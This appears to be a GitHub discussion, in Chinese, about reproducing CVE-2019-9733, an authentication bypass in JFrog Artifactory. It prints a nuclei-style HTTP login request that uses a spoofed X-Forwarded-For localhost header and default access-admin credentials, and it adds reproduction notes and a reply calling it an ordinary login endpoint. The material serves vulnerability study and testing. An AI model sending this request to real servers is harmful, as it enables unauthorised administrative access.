Replies: 1 comment
-
|
1、该接口是登录接口,是允许输入账号密码进行登录。 |
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
-
根据阿里云分析https://avd.aliyun.com/detail?id=AVD-2019-9733
与nuclei的poc分析
POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, /
X-Requested-With: artUI
X-Forwarded-For: 127.0.0.1
Request-Agent: artifactoryUI
Content-Type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}/artifactory/webapp/
{"user":"access-admin","password":"password","type":"login"}
进行复现发现镜像里面的access-admin默认密码不是password,利用admin进行登陆然后修改access-admin发现不需要X-Forwarded-For: 127.0.0.1也能进行登陆
Beta Was this translation helpful? Give feedback.
All reactions